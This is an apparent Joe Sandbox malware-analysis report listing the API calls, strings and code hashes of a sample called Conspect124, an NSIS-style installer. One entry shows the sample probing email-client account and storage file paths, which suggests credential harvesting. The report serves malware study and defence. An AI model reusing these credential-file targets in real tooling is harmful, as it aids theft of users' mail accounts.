                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Text$ItemTimerWindowwsprintf
                                      • String ID: verifying installer: %d%%
                                      • API String ID: 1451636040-82062127
                                      • Opcode ID: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                      • Instruction ID: 725db9d4d41e60ee2dd5d311e5346f84fbed97106a71cca60d70b9a4d06edbb5
                                      • Opcode Fuzzy Hash: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                      • Instruction Fuzzy Hash: 73014471640208ABDF209F60DD49FAA3B69EB00708F008039FA05F91D0DBB989558B99
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065CD
                                      • wsprintfW.USER32 ref: 00406608
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040661C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                      • String ID: %s%S.dll$UXTHEME$\
                                      • API String ID: 2200240437-1946221925
                                      • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                      • Instruction ID: f2f916ca2f11fba704df1b43a3ace0cea71321b702594bff0db05fa861777559
                                      • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                      • Instruction Fuzzy Hash: F9F0F670500219BBCF24AB68ED0DF9B3B6CAB00704F50447AA646F10D1EB78DA24CBA8
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,23BC6FFD,00000000,?,?,?,23BC8A72,?,?,00000100), ref: 23BC887B
                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,23BC8A72,?,?,00000100,5EFC4D8B,?,?), ref: 23BC8901
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 23BC89FB
                                      • __freea.LIBCMT ref: 23BC8A08
                                        • Part of subcall function 23BC56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 23BC5702
                                      • __freea.LIBCMT ref: 23BC8A11
                                      • __freea.LIBCMT ref: 23BC8A36
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                      • String ID:
                                      • API String ID: 1414292761-0
                                      • Opcode ID: e295ed74d4ea6ea3eb2561eb7fb4070bbbc39fea87d63a6bd5fe70aa3a7d70ef
                                      • Instruction ID: 4283d725b19b1d93fefd1a006891b8bdc8ee984a805015a34f1bfd3bb17ca441
                                      • Opcode Fuzzy Hash: e295ed74d4ea6ea3eb2561eb7fb4070bbbc39fea87d63a6bd5fe70aa3a7d70ef
                                      • Instruction Fuzzy Hash: 6F510072610286AFEF35DE64CC80EAB77AAEF54650F140AB9FD05D6190EB34DC50C6A0
                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                      • GlobalFree.KERNEL32(?), ref: 00402950
                                      • GlobalFree.KERNEL32(00000000), ref: 00402963
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                      • String ID:
                                      • API String ID: 2667972263-0
                                      • Opcode ID: 49a6233bec7a959410d96ab4a6536f428a311d60b3465505635374f74429998f
                                      • Instruction ID: c6e800f027f1e1b1e461e4fc783814b3910171fe2b09394c7840a14eb176b3fb
                                      • Opcode Fuzzy Hash: 49a6233bec7a959410d96ab4a6536f428a311d60b3465505635374f74429998f
                                      • Instruction Fuzzy Hash: 9821BFB1D00124BBDF206FA5DE49D9E7E79EF08364F10423AF954762E1CB794C419B98
                                      APIs
                                      • _strlen.LIBCMT ref: 23BC1607
                                      • _strcat.LIBCMT ref: 23BC161D
                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,23BC190E,?,?,00000000,?,00000000), ref: 23BC1643
                                      • lstrcatW.KERNEL32(?,?,?,?,?,?,23BC190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 23BC165A
                                      • lstrlenW.KERNEL32(?,?,?,?,?,23BC190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 23BC1661
                                      • lstrcatW.KERNEL32(00001008,?,?,?,?,?,23BC190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 23BC1686
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: lstrcatlstrlen$_strcat_strlen
                                      • String ID:
                                      • API String ID: 1922816806-0
                                      • Opcode ID: 5bf8e431ecf8bf5d3cf724135d177c7f8b34fcd0e393f2a5f228db36d04760b7
                                      • Instruction ID: e78b66e0ecf356a087e95f0acc0104f666a7491bedf750f2190e1309e0b3216b
                                      • Opcode Fuzzy Hash: 5bf8e431ecf8bf5d3cf724135d177c7f8b34fcd0e393f2a5f228db36d04760b7
                                      • Instruction Fuzzy Hash: CB21B636A00344AFCB25DF58DC81AEE77B8EF9C710F24487BE504AB141DF74AA4287A5
                                      APIs
                                      • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 23BC1038
                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 23BC104B
                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 23BC1061
                                      • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 23BC1075
                                      • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 23BC1090
                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 23BC10B8
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: lstrlen$AttributesFilelstrcat
                                      • String ID:
                                      • API String ID: 3594823470-0
                                      • Opcode ID: b46421322069b88bee0d290cfb384c4aa42352f54e1a9cbab8ea3498f2bef43c
                                      • Instruction ID: 4e1bdfbe2aa529b708616512de2ba497670be9c02533cb48d65a1661ad989240
                                      • Opcode Fuzzy Hash: b46421322069b88bee0d290cfb384c4aa42352f54e1a9cbab8ea3498f2bef43c
                                      • Instruction Fuzzy Hash: 7D219F359003589FCF30EE65DC58EDB3768EF68214F104AA6E959A71A1DA309A86CB50
                                      APIs
                                      • GetLastError.KERNEL32(?,?,23BC3518,23BC23F1,23BC1F17), ref: 23BC3864
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 23BC3872
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 23BC388B
                                      • SetLastError.KERNEL32(00000000,?,23BC3518,23BC23F1,23BC1F17), ref: 23BC38DD
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ErrorLastValue___vcrt_
                                      • String ID:
                                      • API String ID: 3852720340-0
                                      • Opcode ID: 00ac28ad4ebc8c44f0ca7b8d4583d2f0feeebf1007ba1badaf87c6176351b501
                                      • Instruction ID: 21a3f1f8794d5b659a58f16517932545c94226ce577bbc0563ae0f64b0518e7c
                                      • Opcode Fuzzy Hash: 00ac28ad4ebc8c44f0ca7b8d4583d2f0feeebf1007ba1badaf87c6176351b501
                                      • Instruction Fuzzy Hash: 84014C36708B965DE231BF797CD4B462768FF29674B604ABAE11C964E2EF2DC800431C
                                      APIs
                                      • GetLastError.KERNEL32(?,?,23BC6C6C), ref: 23BC5AFA
                                      • _free.LIBCMT ref: 23BC5B2D
                                      • _free.LIBCMT ref: 23BC5B55
                                      • SetLastError.KERNEL32(00000000,?,?,23BC6C6C), ref: 23BC5B62
                                      • SetLastError.KERNEL32(00000000,?,?,23BC6C6C), ref: 23BC5B6E
                                      • _abort.LIBCMT ref: 23BC5B74
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free$_abort
                                      • String ID:
                                      • API String ID: 3160817290-0
                                      • Opcode ID: 2c3d384e9a1c7414376a063c3894dd513afbe362a237f27f8a8bf5633d255bf9
                                      • Instruction ID: 8cf3fdc6361af2be3ec7afa272e98fe8e88f357f3fcc9a9c173b62039312a7d1
                                      • Opcode Fuzzy Hash: 2c3d384e9a1c7414376a063c3894dd513afbe362a237f27f8a8bf5633d255bf9
                                      • Instruction Fuzzy Hash: 7FF0F436204685AEC336FE3B6D04F0B2E29CFE9961F290CF7F91893191EE3485024124
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: CountTick$wsprintf
                                      • String ID: ... %d%%
                                      • API String ID: 551687249-2449383134
                                      • Opcode ID: 72615b24cfb956d11cf5a86cb9c852f061a4764c0f8f0ff8739073b09940aca9
                                      • Instruction ID: 2f3e22fda6cf622f8bf4b8160786ddb998526db62ce5623fe0a3028d3f0862ac
                                      • Opcode Fuzzy Hash: 72615b24cfb956d11cf5a86cb9c852f061a4764c0f8f0ff8739073b09940aca9
                                      • Instruction Fuzzy Hash: A3517171900219EBCB10DF65DA48B9F3B68AF45366F1441BFF805B72C0D7789E508BA9
                                      APIs
                                        • Part of subcall function 23BC1E89: lstrlenW.KERNEL32(?,?,?,?,?,23BC10DF,?,?,?,00000000), ref: 23BC1E9A
                                        • Part of subcall function 23BC1E89: lstrcatW.KERNEL32(?,?,?,23BC10DF,?,?,?,00000000), ref: 23BC1EAC
                                        • Part of subcall function 23BC1E89: lstrlenW.KERNEL32(?,?,23BC10DF,?,?,?,00000000), ref: 23BC1EB3
                                        • Part of subcall function 23BC1E89: lstrlenW.KERNEL32(?,?,23BC10DF,?,?,?,00000000), ref: 23BC1EC8
                                        • Part of subcall function 23BC1E89: lstrcatW.KERNEL32(?,23BC10DF,?,23BC10DF,?,?,?,00000000), ref: 23BC1ED3
                                      • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 23BC122A
                                        • Part of subcall function 23BC173A: _strlen.LIBCMT ref: 23BC1855
                                        • Part of subcall function 23BC173A: _strlen.LIBCMT ref: 23BC1869
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                      • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                      • API String ID: 4036392271-1520055953
                                      • Opcode ID: 934c3392de63456b93de6b0806125f15ae6f8333450b045488fe188513c83c2e
                                      • Instruction ID: 57e0aaa1b1f0b1610b95f6c1b4209b0fb01df049f5b114373556f7c31381289f
                                      • Opcode Fuzzy Hash: 934c3392de63456b93de6b0806125f15ae6f8333450b045488fe188513c83c2e
                                      • Instruction Fuzzy Hash: 5A218279E103486EEB30DA94EC91FEE7339EF54714F0009A6F604FB191E6B15D828759
                                      APIs
                                      • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B0D
                                      • wsprintfW.USER32 ref: 00404B16
                                      • SetDlgItemTextW.USER32(?,004236E8), ref: 00404B29
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ItemTextlstrlenwsprintf
                                      • String ID: %u.%u%s%s$6B
                                      • API String ID: 3540041739-3884863406
                                      • Opcode ID: b14d53b64adc1f374c4cfcdb21d002b99befe6dd1747fbc8fe84211fb49063b4
                                      • Instruction ID: 5e68f5a3766037a7274f1f000e531c578f4d2f2b22a3e42eca2e55653584bdbe
                                      • Opcode Fuzzy Hash: b14d53b64adc1f374c4cfcdb21d002b99befe6dd1747fbc8fe84211fb49063b4
                                      • Instruction Fuzzy Hash: F111D8736481283BDB00656D9C45E9F329CDB81374F150237FE66F61D1D9788C2186EC
                                      APIs
                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403318,00437800,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00406543
                                      • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406552
                                      • CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403318,00437800,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00406557
                                      • CharPrevW.USER32(?,?,00437800,00437800,00435000,00403318,00437800,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 0040656A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Char$Next$Prev
                                      • String ID: *?|<>/":
                                      • API String ID: 589700163-165019052
                                      • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                      • Instruction ID: 6610343985016d4d3861ed5752e28572e14021042ee5aa5e44fa789d85a72fac
                                      • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                      • Instruction Fuzzy Hash: 0811B255800612A5DB303B14AD40AB7A2B8EF58794F52403FED9AB32C5E77C9C9286BD
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,23BC4AEA,?,?,23BC4A8A,?,23BD2238,0000000C,23BC4BBD,00000000,00000000), ref: 23BC4B59
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 23BC4B6C
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,23BC4AEA,?,?,23BC4A8A,?,23BD2238,0000000C,23BC4BBD,00000000,00000000,?,23BC2082), ref: 23BC4B8F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: ac312524d3a6e9db12f40b31a33bd1a8f6a46ee6fc7a4bb52a97fed7d13e5590
                                      • Instruction ID: 46c9c77c7f5fae1eaf514e9c512f6fef14712df3caeb25812441781e8d4f1b9a
                                      • Opcode Fuzzy Hash: ac312524d3a6e9db12f40b31a33bd1a8f6a46ee6fc7a4bb52a97fed7d13e5590
                                      • Instruction Fuzzy Hash: 57F03C35A00248BFDB22AF94C918B9DBFB9EF18661F0045A9E909A7151DB349A41CB94
                                      APIs
                                      • lstrcatW.KERNEL32(00000000,00000000,0040A5A8,00436000,?,?,00000031), ref: 004017B0
                                      • CompareFileTime.KERNEL32(-00000014,?,0040A5A8,0040A5A8,00000000,00000000,0040A5A8,00436000,?,?,00000031), ref: 004017D5
                                        • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                        • Part of subcall function 004052B0: lstrlenW.KERNEL32(004226C8,00000000,?,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                        • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,004226C8,00000000,?,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                        • Part of subcall function 004052B0: lstrcatW.KERNEL32(004226C8,00403233,00403233,004226C8,00000000,?,00403094), ref: 0040530B
                                        • Part of subcall function 004052B0: SetWindowTextW.USER32(004226C8,004226C8), ref: 0040531D
                                        • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                        • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                        • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                      • String ID:
                                      • API String ID: 1941528284-0
                                      • Opcode ID: 47ce6a9d9fbc71e10f5336432a93a05ba538ef86279b97ebc953335fde788606
                                      • Instruction ID: a770c97b6a534c03b62b220807ae8b4c56d0338f794e1485d955ae8f7948b73c
                                      • Opcode Fuzzy Hash: 47ce6a9d9fbc71e10f5336432a93a05ba538ef86279b97ebc953335fde788606
                                      • Instruction Fuzzy Hash: 69419331900519BECF117BB5CD45DAF3A79EF45329B20827FF412B11E2CA3C8A619A6D
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32 ref: 23BC715C
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 23BC717F
                                        • Part of subcall function 23BC56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 23BC5702
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 23BC71A5
                                      • _free.LIBCMT ref: 23BC71B8
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 23BC71C7
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                      • String ID:
                                      • API String ID: 336800556-0
                                      • Opcode ID: 0a87c4870ffbda1b5981cda68abed19d00da17e0d3eec8e20f39ecfe02b04638
                                      • Instruction ID: 6ab2b916776c81120f42d999d0a906038c53a1ff7c3c45916c3076d53dbee51b
                                      • Opcode Fuzzy Hash: 0a87c4870ffbda1b5981cda68abed19d00da17e0d3eec8e20f39ecfe02b04638
                                      • Instruction Fuzzy Hash: 1001AC767012957F6331AEBB4C4DD7B6A6DDED6D6071409BEFD04C7600DE648C0181B4
                                      APIs
                                      • GetLastError.KERNEL32(00000000,?,00000000,23BC636D,23BC5713,00000000,?,23BC2249,?,?,23BC1D66,00000000,?,?,00000000), ref: 23BC5B7F
                                      • _free.LIBCMT ref: 23BC5BB4
                                      • _free.LIBCMT ref: 23BC5BDB
                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23BC5BE8
                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23BC5BF1
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: 76ddc24d43d3e4e3221b31dcb0d0a773fb674b62fb7aa706ebe2a3de0daeb4f8
                                      • Instruction ID: a7889332c8c107b86c96f8fb6bcddd7b46db47e2bcc84bb3242d2019c83ac509
                                      • Opcode Fuzzy Hash: 76ddc24d43d3e4e3221b31dcb0d0a773fb674b62fb7aa706ebe2a3de0daeb4f8
                                      • Instruction Fuzzy Hash: 5D01AD3A204782AEC232FE3A1D84E0B2E6DDFE9570B1509FBF81993152EE6889024164
                                      APIs
                                      • GetDC.USER32(?), ref: 00401DB6
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                      • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                      • CreateFontIndirectW.GDI32(0040CDB0), ref: 00401E38
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                      • String ID:
                                      • API String ID: 3808545654-0
                                      • Opcode ID: bc375dde46825d3f1d903fa7ab5296d8f4650d21e22a6159151442d341355b9e
                                      • Instruction ID: beb1058faab58ab776b37266111e77616320e0f2a6455f46a6b6c1c153f06785
                                      • Opcode Fuzzy Hash: bc375dde46825d3f1d903fa7ab5296d8f4650d21e22a6159151442d341355b9e
                                      • Instruction Fuzzy Hash: B6015272558241EFE7006BB0AF8AA9A7FB4AB55301F10497EF241B61E2CA7800458B2D
                                      APIs
                                      • lstrlenW.KERNEL32(?,?,?,?,?,23BC10DF,?,?,?,00000000), ref: 23BC1E9A
